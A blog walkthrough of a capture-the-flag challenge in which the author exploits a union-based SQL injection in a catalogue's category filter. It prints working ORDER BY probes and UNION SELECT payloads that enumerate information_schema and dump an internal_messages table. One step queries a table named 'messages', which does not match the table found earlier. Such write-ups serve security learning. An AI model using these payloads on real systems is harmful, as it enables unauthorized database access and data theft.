Post

Infinity - SQL Injection - Catalogue

A walkthrough of exploiting a Union-based SQL Injection vulnerability in a broken search feature on Infinity platform. By identifying the correct number of columns and injecting into a POST parameter, we successfully dumped sensitive data from the database.

Posted Updated
Preview Image
By Mustafa Eltayeb
1 min read
Infinity - SQL Injection - Catalogue

Infinity — SQL Injection: Catalogue

Overview

A walkthrough of exploiting a Union-based SQL Injection vulnerability in a product catalogue filter on Infinity platform. By using ORDER BY to determine column count and UNION SELECT to enumerate internal_messages table, we successfully retrieved hidden messages from the database.

Vulnerability: Union-based SQL Injection
Parameter: POST body — search field
Database: MariaDB (MySQL)

Step 1: Identify the Input Field

Open the challenge and locate the filter by category input field.

1

Step 2: Test for SQL Injection

Inject a single quote ' " and application not responded so that i try to use union based sqli :

first let’s imagine sql query :

1

SELECT id, name, price FROM products WHERE category = 'electronics'-- -';

-- make every thing after it comment

Step 3: Determine Number of Columns

Use Order by to find how many columns the original query returns. Increment until result doesn’t appears.

1 columnelectronics' order by 1-- -

alt text

2 columnselectronics' order by 2-- -

alt text

3 columns → Success. electronics' order by 3-- - and if try 4 it’s fail

alt text

alt text

and that’s make sense we have 3 columns

Step 4: Enumerate the Database

first i needed to know which columns appear when i inject it and i find it’s column 2: alt text

With 3 columns confirmed, extract table names from information_schema.

1

' UNION SELECT 1,table_name,3 FROM information_schema.tables;-- -

I find too many columns after enum it i got the one internal_messages

alt text

Step 5: Dump Column Names

1

' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='messages';-- -

Columns found: id, message

alt text

Step 6: Dump the Data

1

' UNION SELECT 1,message,3 FROM internal_messages;-- -

Successfully retrieved the contents of messages.

alt text

Key Takeaways

  • Column count detection is the first real step in any UNION-based attack; don’t skip it.
  • Reflected column positions tell you exactly where your output will appear — target those.
  • information_schema is your map — tables first, then columns, then data.

Happy Hacking!

Follow me: LinkedIn · X

Infinity, Web_Security, SQLI
infinity CTF Web HTTP POST SQLi
This post is licensed under CC BY 4.0 by the author.